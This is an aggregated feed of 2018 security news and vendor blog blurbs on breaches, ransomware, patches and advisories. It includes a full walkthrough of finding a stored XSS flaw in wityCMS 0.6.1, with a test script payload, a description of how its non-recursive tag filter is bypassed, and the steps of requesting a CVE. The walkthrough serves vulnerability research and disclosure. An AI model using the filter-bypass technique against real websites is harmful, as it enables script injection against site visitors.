Threat News Ledger

News, opinion, advice and research on computer security threats from Sophos

An Aussie high schooler pleaded guilty on Thursday to hacking Apple servers multiple times.

For Intel and more than a billion computers with Intel CPUs, the microprocessor flaws just keep coming.

The Trump administration has rolled back Obama-era rules that outlined how to launch cyberattacks on other nations.

An identity theft online dating scam led police to uncover texts that detailed the murder-for-hire plot.

How to handle sextortion - where someone tries to blackmail you over your sexuality or sex life...

The Australian government wants to increase the criminal penalty for refusing to decrypt data from 2 years to 10 years.

For 2 years, welfare investigators used a huge database of automated license plate reader images to sniff out fraud, without audit or policy.

The family of "Dread Pirate Roberts" got him an account and is typing in, word for word, his tweets, including his hope for Trump's clemency.

What's worse than fake news? Fake science - published in legitimate looking journals.

Shock! It appears Google can track the location of anyone using some of its apps on Android or iPhone even when they’ve told it not to.

Online headquarters of Kaspersky Lab security experts.

Average spam volume of 49.66% in world mail traffic in this quarter fell 2.16 p.p. in comparison with the previous reporting period, and the Antiphishing system prevented more than 107M attempts to connect users to phishing sites, which is 17M more than in the first quarter of 2018.

In the last few days, our anti-ransomware module has been detecting a new variant of malware - KeyPass ransomware. According to our information, the malware is propagated by means of fake installers that download the ransomware module.

Olympic Destroyer worm, Roaming Mantis mobile banker, Operation Parliament cyber-espionage campaign, SynAck ransomware and other notable targeted attacks and malware campaigns of Q2 2018.

In Q2 2018, attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 215,762 users, ransomware attacks were registered on the computers of 158,921 unique users.

It’s easy to notice if you've fallen victim to an advertising partner program: the system has new apps that you didn’t install, ad pages spontaneously open in the browser, ads appear on sites where they never used to, and so on. If you notice these symptoms on your computer, 99% of the time it’s “partner stuff”.

Kaspersky Lab ICS CERT has identified a new wave of phishing emails with malicious attachments targeting primarily companies and organizations that are, in one way or another, associated with industrial production.

Recently, an interesting miner implementation appeared on Kaspersky Lab’s radar. The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers.

The growing popularity of car sharing services has led some experts to predict an end to private car ownership in big cities. But information security specialists have started raising some pertinent questions: how are the users of these services protected and what potential risks do they face in the event of unauthorized access to their accounts?

In H1 2018, the average and maximum attack power fell significantly compared to H2 2017. In Q2 2018, cybercriminals continued the above-outlined trend of searching for exotic holes in UDP transport protocols. It surely won’t be long before we hear about other sophisticated methods of attack amplification.

As researchers we interesting in developmental prototypes of malware that have had limited distribution or not even occurred in the wild. We recently came across one such sample: a macOS backdoor that we named Calisto.

Read, think, share … Security is everyone's responsibility

Researchers discovered a new modular downloader, tracked as Marap malware, that is being used in large campaigns targeting financial institutions. Researchers from Proofpoint have spotted a new modular downloader in large campaigns targeting financial institutions, experts believe the malicious code could be used to deliver additional malware in future attacks. Earlier August, Proofpoint reported several […] The post Marap modular downloader opens the doors to further attacks appeared first on Security Affairs.

According to Australian media, a teen hacker broke into Apple mainframe and downloaded 90GB of secure files. He dreams to work for the Tech Giant. I believe it is time for Apple to hire an Australian 16-year old schoolboy who hacked its computer systems. Yes, it is not a joke, according to Australian media the teen […] The post An Australian schoolboy hacked into Apple Servers and stole 90GB of secure files appeared first on Security Affairs.

An Italian cybersecurity passionate discovered that it was possible to recover the expired messages from Signal version 1.14.3, Advisory ID: n0sign4l-002 Risk level: 4 / 5 Title: Signal Desktop – Recover Expired Messages Credit: Leonardo Porpora – ‘n0sign4l’ Product: Signal CVE: CVE-2018-14023 Version: 1.14.3 and prior Public Disclosure:  17/08/2018 Vendor: Open Whisper System Details  Signal version […] The post CVE-2018-14023 – Recovering expired messages from Signal appeared first on Security Affairs.

The security researcher Sam Thomas from Secarma, has discovered a new attack technique that leverages critical deserialization vulnerabilities in PHP programming language. The flaws potentially expose web applications written in the popular language to cyber attacks, including websites running CMSs like WordPress and Typo3. The expert discovered that an attacker can use low-risk functions against Phar archives to trigger […] The post Black Hat 2018 – Expert demonstrated a new PHP code execution attack appeared first on Security Affairs.

Linux kernel maintainers have rolled out security updates for two DoS vulnerabilities tracked as SegmentSmack and FragmentSmack. Linux kernel maintainers have released security patches that address two vulnerabilities, tracked as two bugs are known as SegmentSmack (CVE-2018-5390) and FragmentSmack (CVE-2018-5391). potentially exploitable to trigger a DoS condition. The vulnerabilities reside the Linux kernel’s TCP stack, an attacker can […] The post Linux Kernel Project rolled out security updates to fix two DoS vulnerabilities appeared first on Security Affairs.

Cosmos Bank, one of the largest Indian cooperative banks, confirmed it was the victim of a cyberheist, over the weekend hackers stole over 940 million rupees ($13.5 million) in three days. Hackers stole over 940 million rupees ($13.5 million) in three days from the Indian cooperative Cosmos bank. The Cosmos bank publicly disclosed the attacks in a […] The post Cosmos Bank – Hackers stole Rs 94 crore ($13.5 million) in just in 2 days appeared first on Security Affairs.

Cyber Defense Magazine August 2018 Edition has arrived. Sponsored by: Bosch We hope you enjoy this month’s edition…packed with 130+ pages of excellent content.  InfoSec Knowledge is Power.  We have 6 years of eMagazines online with timeless content.  Visit our online library by clicking here.   Please tell your friends to FLIPBOOK http://www.cyberdefensemagazine.com/newsletters/august-2018/index.html PDF http://www.cyberdefensemagazine.com/newsletters/august-2018/CDM-CYBER-DEFENSE-eMAGAZINE-August-2018.pdf MOBILE http://www.cyberdefensemagazine.com/newsletters/august-2018/mobile/index.html  Our Global […] The post Cyber Defense Magazine – August 2018 has arrived. Enjoy it! appeared first on Security Affairs.

SAP released security notes for August 2018 that address dozens patches, the good news is that there aren’t critical vulnerabilities. SAP issues 27 Security Notes, including 14 Patch Day Notes and 13 Support Package Notes. Seven notes are related to previously published patches. “On 14th of August 2018, SAP Security Patch Day saw the release of 12 Security Notes. […] The post SAP Security Notes August 2018, watch out for SQL Injection appeared first on Security Affairs.

Piping botnet – Israeli researchers warn of a potential distributed attack against urban water services that uses a botnet of smart irrigation systems that water simultaneously. Ben-Gurion University of the Negev (BGU) cyber security researchers warn of a potential distributed attack against urban water services that uses a botnet of smart irrigation systems that water […] The post Piping botnet: Researchers warns of possible cyberattacks against urban water services appeared first on Security Affairs.

Security experts from the cloud security firm Avanan have discovered a new technique dubbed PhishPoint, that was used by hackers to bypass Microsoft Office 365 protections. PhishPoint is a new SharePoint phishing attack that affected an estimated 10% of Office 365 users over the last 2 weeks. The experts are warning of the new technique […] The post PhishPoint Phishing Attack – A new technique to Bypass Microsoft Office 365 Protections appeared first on Security Affairs.

News, views, and insight from the ESET security community

His lawyer claims that the teen did the hacking because he admired Apple and dreamed of landing a job in the company The post Australian schoolboy hacks into Apple’s network, steals files appeared first on WeLiveSecurity

The first week in security video round-up from WeLiveSecurity The post Week in security with Tony Anscombe appeared first on WeLiveSecurity

The newly-released report provides an overview of the data breach landscape in the first half of this year The post Some 2.6 billion data records exposed in first half of 2018 appeared first on WeLiveSecurity

If you’re an Instagrammer, you may want to take some basic precautions, such as picking a strong and unique password and signing up for two-factor authentication sooner rather than later The post Instagram users locked out of accounts en masse appeared first on WeLiveSecurity

Heralded as the answer to many cybersecurity issues, machine learning hasn’t always delivered The post Black Hat 2018: AI was supposed to fix security – what happened? appeared first on WeLiveSecurity

Unbeknownst to exploit writers, the seemingly mouth-watering bugs would be bogus and non-exploitable The post Can cramming code with bugs make it more secure? Some think so appeared first on WeLiveSecurity

Aiming to protect critical infrastructure against attacks The post Black Hat 2018: Protecting Industrial Control System appeared first on WeLiveSecurity

The golf association is said to have had little success with restoring access to its files so far The post Attackers grab hold of PGA of America files, demand ransom appeared first on WeLiveSecurity

All good things come to an end, and we’re rounding off our series of interviews to mark the 27th anniversary since computer scientist Tim Berners-Lee publicly announced the World Wide Web project The post Interviewing ESET’s experts about the Web’s journey so far – part 3 appeared first on WeLiveSecurity

The slew of vulnerabilities – since patched – were found without the use of automated testing tools The post Software bugs put nearly 100 million health records at risk of exposure appeared first on WeLiveSecurity

Today, we continue with our series of conversations with ESET’s security pros to hear what they have to say about the evolution of the World Wide Web since it was publicly announced 27 years ago The post Interviewing ESET’s experts about the Web’s journey so far – part 2 appeared first on WeLiveSecurity

The malware outbreak has even prompted concerns of delays in the shipments of the next wave of iPhones The post Apple chip supplier blames WannaCryptor variant for plant shutdowns appeared first on WeLiveSecurity

What has the journey of the World Wide Web been like so far, as seen and experienced by ESET’s security folk? ESET Senior Research Fellow David Harley provides his take in the first installment of our series of interviews marking the Web’s 27th birthday The post Interviewing ESET’s experts about the Web’s journey so far – part 1 appeared first on WeLiveSecurity

The company has learned the hard way that there are better ways to deliver two-factor authentication than via text messages The post Reddit reveals breach as attacker circumvents staff’s 2FA appeared first on WeLiveSecurity

But don’t get too excited just yet: the first-of-its-kind bug bounty program for printers is invite-only for now The post HP offers rewards for hacking its printers appeared first on WeLiveSecurity

With this update, Microsoft is bringing a feature for Android users that has been available on iOS devices for quite a while now The post OneDrive app for Android updated with fingerprint authentication appeared first on WeLiveSecurity

The nature of the vulnerability hasn’t been disclosed, but is said to have already been identified and fixed The post Inmates hack prison tablets for free credits appeared first on WeLiveSecurity

The company credits hardware-based two-factor authentication with practically eliminating the problem of phishing attacks that have targeted its own employees of late The post Google wants you to beef up your account security with its own hardware token appeared first on WeLiveSecurity

This is bad news for many websites that have yet to embrace encrypted connections The post Chrome now flags HTTP sites as “not secure” appeared first on WeLiveSecurity

Fraudsters are using bogus apps to convince users of three Indian banks to divulge their personal data The post Fake banking apps on Google Play leak stolen credit card data appeared first on WeLiveSecurity

It might seem legit but there are several reasons why you should not always hit the panic button when someone claims to have your email password The post I saw what you did…or did I? appeared first on WeLiveSecurity

Top tips to help you avoid being caught receiving or sending phishing-looking emails The post Hook, line, and sinker: How to avoid looking ‘phish-y’ appeared first on WeLiveSecurity

Patches have already been released or are expected to see the light of day soon The post Bluetooth bug could expose devices to snoopers appeared first on WeLiveSecurity

A study assessed whether or not the most popular English-language websites help users strengthen their security by providing them with guidance on creating safer passwords during account sign-up or password-change processes The post Major sites still largely lax on prompting users towards safer password choices, study finds appeared first on WeLiveSecurity

Federal agency issues Notices of Violation to Datablocks and Sunlight Media for allegedly facilitating the installation of malware through online advertising The post Canada tackles malicious online advertising appeared first on WeLiveSecurity

Tech giant has 90 days to comply with ruling or faces further penalties over ‘anti-competitive’ practices The post Google slapped with €4.34bn fine by EU over antitrust violations appeared first on WeLiveSecurity

Thousands of British Airways passengers left stranded at Heathrow airport following incident The post British Airways cancelled flights at Heathrow after ‘IT system issue’ appeared first on WeLiveSecurity

ESET researchers have analyzed remote access tools cybercriminals have been using in an ongoing espionage campaign to systematically spy on Ukrainian government institutions and exfiltrate data from their systems The post A deep dive down the Vermin RAThole appeared first on WeLiveSecurity

Gary Davis accused of working as an administrator for the notorious dark web marketplace appears in a federal court in New York The post Irishman extradited to the US to face charges relating to Silk Road appeared first on WeLiveSecurity

Social media giant fined in the UK for failing to protect users’ personal information and for a lack of transparency The post Facebook fined over data privacy scandal appeared first on WeLiveSecurity

Law enforcement and malware research join forces to take down cybercriminals The post Trends 2018: Doing time for cybercrime appeared first on WeLiveSecurity

Website altered to serve a malware-tainted version of otherwise legitimate software with the global event in Russia acting as a smokescreen The post Ammyy Admin compromised with malware again; World Cup used as cover appeared first on WeLiveSecurity

Reminiscent of the recent controversy surrounding the fitness-tracking app Strava, the tale involving Polar Flow shows how the sharing of seemingly innocuous – but potentially telltale – data can have significant privacy implications The post Polar Flow app exposes geolocation data of soldiers and secret agents appeared first on WeLiveSecurity

D-Link and Changing Information Technologies code-signing certificates stolen and abused by highly skilled cyberespionage group focused on East Asia, particularly Taiwan The post Certificates stolen from Taiwanese tech-companies misused in Plead malware campaign appeared first on WeLiveSecurity

The attack, called "Thermanator", could use your body heat against you in order to steal your credentials or any other short string of text that you have typed on a computer keyboard The post Attackers could use heat traces left on keyboard to steal passwords appeared first on WeLiveSecurity

Recommendations for pentesters looking for security flaws in iOS applications made by developers The post Five tips for pentesters in iOS appeared first on WeLiveSecurity

You’ve set up an out-of-office auto-responder and packed your stuff, but have you done all of your “homework” before you rush out the front door for that well-deserved time off? The post Going on vacation? Five things to do before you leave appeared first on WeLiveSecurity

Her Majesty's Revenue & Customs (HMRC) is “consistently the most abused government brand”, according to the National Cyber Security Centre (NCSC) The post Britain’s tax authority reports takedown of record 20,000 fake sites appeared first on WeLiveSecurity

The principle of least privilege is a security strategy applicable to different areas, which is based on the idea of only granting those permissions that are necessary for the performance of a certain activity The post The principle of least privilege: A strategy of limiting access to what is essential appeared first on WeLiveSecurity

Profuse recounting of details from your life via social media may come at a price The post How (over)sharing on social media can trip you up appeared first on WeLiveSecurity

Social media giants announce new measures to tackle bots and abusers The post Twitter bots, disassemble appeared first on WeLiveSecurity

The football associations of countries competing at Russia 2018 are taking no chances when it comes to cyber-related issues The post World Cup squads briefed on cybersecurity best practices appeared first on WeLiveSecurity

The new wireless security protocol is poised to make hacking Wi-Fi connections a whole lot harder The post Wi-Fi security gets a boost as WPA3 standard is launched appeared first on WeLiveSecurity

Since a patch for the flaw has already been released, users are well advised to make sure that they’re running the browser’s most recent version The post Microsoft Edge bug could be exploited to spill your emails to malicious sites appeared first on WeLiveSecurity

The tale of “Bitcoin Baron” reveals a worrying picture and illustrates how easy it has become to wreak havoc on the internet The post Ham-fisted hacker gets jail time for serial DDoS attacks appeared first on WeLiveSecurity

Bithumb has claimed that $31.5 million worth of virtual coins were stolen by hackers The post South Korea’s largest cryptocurrency exchange hacked appeared first on WeLiveSecurity

Our lineup may seem heavy on the defensive side, but such is the nature of game plans for warding off a range of threats lurking in cyberspace The post 11 ‘teammates’ to help you win your own cybersecurity game appeared first on WeLiveSecurity

The arrest of a 25-year-old French man in Thailand apparently seals the fate of Rex Mundi, a hack-and-extort collective that operated since at least 2012 The post Europol and partners dismantle prolific cyber-extortion gang appeared first on WeLiveSecurity

Entirely new malware family discovered by ESET researchers The post New Telegram-abusing Android RAT discovered in the wild appeared first on WeLiveSecurity

A comprehensive list of some of the online resources available to victims, their families and friends The post Stop Cyberbullying Day: Advice for victims and witnesses appeared first on WeLiveSecurity

Protect Your Interwebs!

The US Federal Bureau of Investigation (FBI) just released a public service announcement (PSA) to the public about a large number of websites being exploited and compromised through WordPress plugin vulnerabilities: Continuous Web site defacements are being perpetrated by individuals sympathetic to the Islamic State in the Levant (ISIL) a.k.a. Islamic State of Iraq andRead More

Security Risk: Dangerous Exploitation level: Very Easy/Remote DREAD Score: 8/10 Vulnerability: Persistent XSS Patched Version:  1.4.4 During a routine audit for our Website Firewall (WAF), we discovered a dangerous Persistent XSS vulnerability affecting the very popular WP-Super-Cache plugin (more than a million active installs according to wordpress.org). The security issue, as well as another bug-fixRead More

Last year, we released a post about a malware injector found in an Adobe Flash (.SWF) file. In that post, we showed how a .SWF file is used to inject an invisible, malicious iFrame. It appears that the author of that Flash malware continued with this method of infection. Now we are seeing more varietiesRead More

Have you ever heard of the term PCI? Specifically, PCI compliance? If you have an e-commerce website, you probably have already heard about it. But do you really understand what it means for you and your online business? In this series, we will try to explain the PCI standard and how it affects you andRead More

Darkleech is a nasty malware infection that infects web servers at the root level. It use malicious Apache modules to add hidden iFrames to certain responses. It’s difficult to detect because the malware is only active when both server and site admins are not logged in, and the iFrame is only injected once a dayRead More

I joined Sucuri a little over a month ago. My job is actually as a Social Media Specialist, but we have this process where regardless of your job you have to learn what website infections look like and more importantly, how to clean them. It’s this idea that regardless of you are you must alwaysRead More

Today, with the proliferation of open-source technologies like WordPress, Joomla! and other Content Management Systems (CMS) people around the world are able to quickly establish a virtual presence with little to no cost. In the process however, a lot is being lost in terms of what it means to own a website. We are failingRead More

The last 7 days have been very busy with a number of vulnerabilities being disclosed on multiple WordPress plugins. Some of them are minor issues, some are more relevant, while others are what we’d categorize as noise. How are you supposed to make sense of all this? To help provide some clarity on the influxRead More

Trojan (or trojan horse) is software that does (or pretends to be doing) something useful but also contains a secret malicious payload that inconspicuously does something bad. In WordPress, typical trojans are plugins and themes (usually pirated) which may have backdoors, or send out spam, create doorways, inject hidden links or malware. The trojan modelRead More

Security Risk: Critical Exploitation level: Very Easy/Remote DREAD Score: 9/10 Vulnerability: Password bypass / Privilege Escalation Patched Version:  2.0.9.2 During a routine audit of our Website Firewall (WAF), we found a critical vulnerability affecting the popular MainWP Child WordPress plugin. According to worpdress.org, it is installed on more than 90,000 WordPress sites as as remote administrationRead More

Emerging threats and malware research

We’ve been tracking some more spam dropping Zepto ransomware variants. Like earlier posts, we’re seeing infected attachments with malicious macro scripts used as the entry point for the threat actor. (See images below of some recent spam samples.) As we dig deeper into our analysis, we found out that these macro scripts are not crafted […] The post Zepto Evasion Techniques appeared first on ThreatTrack Security Labs Blog.

Recently, we’ve spotted Zepto ransomware spreading through spam email containing fake invoices (see image below). These attachments contain a Macro-Enabled word document file known as Donoff, which downloads the Zepto executable that encrypts all your files and will later ask for payment of the decryption key. We decided to take a closer look on the Donoff […] The post Donoff Macro Dropping Ransomware appeared first on ThreatTrack Security Labs Blog.

ThreatTrack Labs has recently observed a surge of spam containing a zip attachment with a WSF (Windows Scripting File) to deliver Zepto ransomware. This tactic is a change from the common JavaScript and macro documents being spammed previously. Here are actual emails featuring familiar social engineering tactics: The zip attachments contain the WSF.   An Interactive […] The post Zepto Ransomware Packed into WSF Spam appeared first on ThreatTrack Security Labs Blog.

Reports of a Zero-day attack affecting numerous Office 365 users emerged late last month (hat tip to the researchers at Avanan), and the culprit was a new variant of the Cerber ransomware discovered earlier this year. As with the other Zero-day threats that have been popping-up like mushrooms of late, the main methods of infection […] The post A Look at the Cerber Office 365 Ransomware appeared first on ThreatTrack Security Labs Blog.

TeslaCrypt is yet another ransomware taking the cyber world by storm. It is mostly distributed via a spear phishing email and through the Angler exploit kit. The Angler exploits vulnerability in Adobe Flash. The Angler exploit downloads a variant of the ransomware upon success. TeslaCrypt 3.0 possesses various updates, one of which renders encrypted files […] The post A Close Look at TeslaCrypt 3.0 Ransomware appeared first on ThreatTrack Security Labs Blog.

It’s been the norm in the cybersecurity industry to be intrigued and at the same time be infuriated by the people behind any successful large-scale malware attack. Ransomware is one such example. It’s been slowly released in the wild since the early 2009, but CryptoWall redefined the meaning of ransomware and took it to the […] The post The Day the Earth Stood Still for CryptoWall appeared first on ThreatTrack Security Labs Blog.

It is one of the most prevalent spam malware in the wild today: Locky ransomware. The Locky malware authors started their campaign last year but didn’t become very active until January 2016 – and they haven’t slowed down since. Locky e-mails usually come in with an attached zip archive and once extracted may contain a […] The post Understanding the Latest Version of Locky Ransomware appeared first on ThreatTrack Security Labs Blog.

Ransomware has become an increasingly serious threat. Cryptowall, TeslasCrypt and Locky are just some of the ransomware variants that infected large numbers of victims. Petya is the newest strain and the most devious among them. Petya will not only encrypt files but it will make the system completely useless, leaving the victim no choice but […] The post A Glimpse at Petya Ransomware appeared first on ThreatTrack Security Labs Blog.

Security researchers recently discovered that the power outage in the Ukraine in December was caused by a malware and identified as an evolved version of BlackEnergy. This Trojan, dating back to 2007, was a popular malware that was previously sold in Russian underground sites. However, its design and architecture changed from performing simple HTTP DDos attacks to […] The post Breaking Down the Malware Behind the Ukraine Power Outage appeared first on ThreatTrack Security Labs Blog.

Credit: Christopher D. Del Fierro, Lead Malware Research Engineer, ThreatTrack Security We have seen Dridex since 2014 and it is still active in the wild today. This research will be focusing on analyzing Dridex and on how it is able to remain undetected by most antivirus engines. For those not familiar with Dridex, it is a malspam […] The post What’s New with Dridex appeared first on ThreatTrack Security Labs Blog.

The most recent posts from across the AlienVault blogs.

Well Javvad Malik has created another awesome report taking on what taking security seriously actually looks like - both for customers and providers. Here's a little excerpt: The “we take security seriously” line is the security equivalent of the infamous call center “your call is important to us” line. Everybody says it because that’s what you say. Taking security seriously is not a statement to be made, it’s achieved by making security part of your process, and that’s visible to everyone. - Scott Helme Taking security seriously isn’t measured by a solitary point in time, nor can it be boiled down to implementing a single standard set of controls. There are many factors that contribute to this mindset. If someone says they take security seriously, they should be able to defend that statement in some manner. It doesn’t need to be a universally accepted position; it just needs to be something that shows they have put some thought into it and arrived at a logical conclusion. Security doesn’t always need to be visible. It doesn’t need to be done for ‘show’ - a “security theatre” if you will. The problem today is that too many companies don’t think about security in earnest at all - well at least not until they get breached. After a breach, however, they all inevitably state: ‘we take security seriously’. The Japanese say you have three faces. The first face, you show to the world. The second face, you show to your close friends, and your family. The third face, you never show anyone. It is the truest reflection of who you are. Similarly, you could say that security has three faces. The security you show to the world, the security that is visible internally in your organization, and the third reflects how you truly feel about security - that is the real measure of seriously you take security. Read the whole report here!       

Content Management Systems (CMS) are usually good to check out for security issues, especially if the system is gaining popularity or being used by a number of people. Doing a white box type of assessment not only gives the potential to discover security issues but it opens interesting possibilities if ever a bug is found. This is because a white box assessment looks into the internal structure of how an application works.   WityCMS, for instance, is a system made by CreatiWity which assists in managing content for different uses, like personal blogging, business websites, or any other customized systems. In this post, I will walk through the steps of setting up the CMS, finding a web application issue, and processing a CVE for it. Installation (Windows with XAMPP) 1. Download a copy of the source code (Version 0.6.1). 2. Extract the folder /witycms-0.6.1 from the archive to C:\xampp\htdocs\ or where ever you have installed XAMPP in Windows. 3. Assuming Apache and MySQL are running, visit http://localhost/phpmyadmin/index.php. 4. Click on the "databases" tab. 5. Type in “creatiwity_cms” as the name of the database and click create. 6. You should now able to browse the application by visiting http://localhost/witycms-0.6.1/ 7. Fill in data required. Like for “Site name”, I’ve added in “Test”. Click on the Next button. 8. Next comes defining the homepage of the system. You can choose any from the options. For example: 9. Setting up the database is next. From step #5, I have used the database name “creatiwity_cms” so this goes in the database setup. 10. Enter the administrator account details and click “Launch install!” (I have added user “admin” with the password of “admin” here) 11. Once successful, this page should pop up: Finding a Web Application Security Issue Since this article is about CVE-2018-11512, I will be limiting the scope of finding web application vulnerabilities to a persistent XSS vulnerability. But first, let’s try to understand what a persistent XSS is.   According to OWASP, “Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites”. This simply means that an attack can happen if an injection point can be taken advantage of in a website. Basically, there are three types of XSS but I'll discuss the common ones - namely reflected and persistent.   Reflected XSS can happen whenever an input data is thrown back at us after a request has been made. A very good example of a potentially vulnerable point for reflected XSS is a search function in a website. When a user enters a term in the search field and the website returns the term entered, that search function is potentially vulnerable to a reflected XSS.   Persistent XSS on the other hand is also called “stored” XSS. This type of XSS can only happen if the value is being saved somewhere in the system, whether it is through a database or a file, and later retrieved for presentation. An example of this one can be a field that requires user details such as the user’s email, first name, last name, address, and more. This can also be settings in a system that a user is able to change in any time. In the case of wityCMS, the target is to find fields that can save data in the system. This can basically be done both manually and through automated finding of these fields. Since I have installed it in Windows, I had to use the command “findstr” instead of “grep” (Sorry “grep” fans). A reference of “findstr” can be found here.   To list down the files having input fields, we can use the following flags:   /S = Recursive searching /P = Skip files with non-printable characters /I = Case insensitive /N = Prints the line number /c:<STR> = String to look for   Code: findstr /SPIN /c:"<input" "c:\xampp\htdocs\witycms-0.6.1\*.html"   The result of running the command above will be: Now, since the result is surely astounding because there are a lot of fields, we can easily pinpoint potential input boxes to start with once we login to the administrator panel. By visiting the URL http://localhost/witycms-0.6.1/, a noticeable value can be seen as shown in the image: When we were setting up the system, we were asked to input the site name and it’s currently showing up in the main page. Wondering if that site name could lead to a persistent XSS, let’s see if it can be modified within the administrative settings. Login to the administration panel with the credentials entered during the setup. Once logged in, a small link to the administration panel should look like below: When I clicked on the “Administration” hyperlink, I got redirected to the Settings page because this was the page I entered during the setup and the first field there is the website’s name too. A very basic test for XSS is through adding a Javascript code such as:   Code: <script>alert(1)</script> When you click the “save” button, the field returns the value: Notice that the tags <script> and </script> were stripped off. Since the tags were stripped, we now know that there is a sanitizing mechanism in the code. The next step is finding out how the sanitizing method works.   Whenever data like the above is being saved in the database, a request is being processed. In this case, we should be able to identify if the request method is a POST or GET by right clicking the field and doing an “inspect”. After viewing the client source code, it can be confirmed that the method is a POST request. At this point, we should try to find where the POST request happens so we can see the sanitizing method. To do this, type in the following command in cmd:   Code: findstr /SPIN /c:"$_POST" "c:\xampp\htdocs\witycms-0.6.1\*.php"   The command is similar to what we did earlier to find files containing the “input” tag but this time, we are trying to find references of “$_POST” in .php files. The result of the command points us to the files WMain.php, WRequest.php, and WSession.php because the other files pertain to libraries included. Browsing these files will then point us to an interesting function found in WRequest.php as shown below and notice that when a script tag is found, it is being replaced by an empty string: Replacing the “script” tag with an empty string actually works as a sanitizing technique but it should filter recursively. After doing more analysis, it has been found out that the “filter” function was being called only once by referring to this function found in the same file: Since there is no recursion for the filter function, the filter can only work for an input like this: The filter can then be bypassed by entering an input like: Trying this out as the input in the website’s name field will get us a result of: Once this payload becomes the site name, a visiting user will be able to come across this script even when he or she is unauthenticated: This opens a whole new world of opportunities because being able to execute an unwanted script when a user visits the website can be disastrous. Examples for this could be redirecting a user to a phishing site, executing miner scripts without the knowledge of the user, or many other possibilities. Processing a CVE Number Since this bug leads to a security issue and the CMS application is being used by about a hundred or more people, I decided to process an application for a CVE number as to get a public advisory. CVE or the “Common Vulnerabilities and Exposures” is simply a list of entries that show references of vulnerabilities for applications used in computing. There are CNAs or “CVE Numbering Authorities” that process these CVE numbers depending on the application support. For instance, if a security issue has been found in a Lenovo device, it should be reported to Lenovo’s PSIRT (Product Security Incident Response Team). After they assess the vulnerability, they will process a CVE number for it. This simply means that if a security issue has been found in a product or project of a company that’s also a CNA, they can process the CVE number directly. A list of CNAs can be found here . In the case of wityCMS, CreatiWity, the creator of the product is not a registered CNA so we can request a CVE number for this persistent XSS through MITRE Corporation. Below are the steps to process a CVE number.   1. Confirm if the product is managed by a CNA. If it is managed by a CNA, report the vulnerability to that specific CNA. If not, report it to MITRE Corporation. 2. Confirm if the vulnerability found has already been assigned a CVE number. This can be done using a simple Google search about the product. Always check for the product updates to confirm if a public advisory already exists. 3. For wityCMS’s case, I have used MITRE’s CVE form which can be found here.  4. Fill in the form with the required details. For wityCMS, I have added in the following: Vulnerability Type: Cross-Site Scripting Product: wityCMS Version: 0.6.1 Vendor confirmed the vulnerability? No (Not acknowledged yet at the time of request) Attack Type: Remote Impact: Code execution Affected Components: Source code files showing “site_title” as output Attack Vector: To exploit the vulnerability, one must craft and enter a script in the Site name field of the system Suggested Description: Stored cross-site scripting (XSS) vulnerability in the "Website's name" field found in the "Settings" page under the "General" menu in Creatiwity wityCMS 0.6.1 allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to admin/settings/general. Discoverer: Nathu Nandwani Reference(s): https://github.com/Creatiwity/wityCMS/commit/7967e5bf15b4d2ee6b85b56e82d7e1229147de44   Information you provide should be detailed. To make the CVE number processing fast, a public reference should exist to discuss details of the vulnerability and a possible fix (if existing). For example, before sending in this report, I opened an issue in the project’s GitHub page with the suggested description. Since there are a lot of CVE numbers representing persistent XSS issues, I figured there would be good examples.  I found one and used it as a model. Final Tips: CVE number processing takes only a day or two if the details have been disclosed publicly, so it is always best if you communicate with the developer or the response team associated with the project for proper fixing first. Details of CVEs should be accurate. Changing details of the report sent to CNAs will slow down the process of the application. That means the vulnerability has to be confirmed first to make sure that time is not wasted by both sides. More details about the conditions for CVE number applications can be found in the document at this website: http://common-vulnerabilities-and-exposures-cve-board.1128451.n5.nabble.com/attachment/850/0/Draft%20CVE%20ID%20Request%20Guidelines%20v1.0.docx  VulDB helps in public advisories. Register in VulDB and you can submit an entry there. For example, here is the VulDB entry of this security issue.  Submit an entry for exploit-db.com too. This doesn’t only show proof of the issue, but it also adds a credible reference for the CVE number because offensive-security teams try their best to test the proof of concept. It's here https://vuldb.com/?id.118269 and notice that it is currently pending verification. The submission instructions can be found here. I found other persistent XSS vulnerabilities in this specific version of wityCMS but I haven’t gotten a CVE numbers. Can you identify them? Looking forward to hearing comments or questions. Cheers!       

Executive Summary: Cybersecurity is a growing concern as breaches continue to increase in frequency and make headline news. Unfortunately, due to time and other constraints, many smaller businesses postpone the complicated task of risk management, only to eventually succumb to the devastating ramifications of a cyberattack. While the security solutions themselves appear complicated, the ability to mitigate risk is within reach of all. Through partnering with a trusted Managed Security Service Provider (MSSP) that offers expertise to ensure the safety of sensitive systems and data, every company – no matter the size – can lessen the risks involved. Every day we see a new headline that turns the spotlight on cyberattacks of retail giants and enterprise businesses. It’s alarming and causes a ripple effect of fear across our daily lives. While this intense publicity increases awareness for cybersecurity in general – it’s not always effective at bringing attention to business leaders who think smaller companies are inherently unattractive targets for cybercriminals. In actuality, this sort of misunderstanding leaves companies highly vulnerable, especially those with limited resources, expertise, and budgets. As threat tactics evolve, they are more exposed than ever due to: New malware variants introduced daily Complexity of securing multiple points of access Cybersecurity skills shortage – coupled with lack of time and money What’s more, thinking a company is safe in today’s threat climate is potentially one of the most costly mistakes smaller companies can make. They are easy targets, with slim chances of recovery as an attack averages $117,000 in costs, which factors into a 40% chance of survival.  The Value of MSSPs Fortunately, there’s a silver lining. With help from a trusted Managed Security Service Provider (MSSP), companies with limited resources  can ensure their systems are safe and protected without hiring an in-house team. Whether it’s day-to-day monitoring, analysis, detection, response, and reporting on vulnerabilities, these security experts offer businesses of all sizes the peace of mind they need – at surprisingly affordable costs. For more information on how working with an MSSP can help your business mitigate risk, watch this short and informative video AlienVault MSSPs For nearly a decade, we’ve equipped an extensive network of MSSPs with robust technology that allows for quick reaction and response to security challenges, worldwide. AlienVault Unified Security Management (USM) is a cornerstone in building successful managed security and compliance service offerings. Trusted by 7,000+ customers, we simplify security, save costs, and reduce complexity and deployment time for businesses of all sizes. What’s Next? Visit our website to learn more about outsourcing your security needs or get introduced to one of our trusted MSSP partners.       

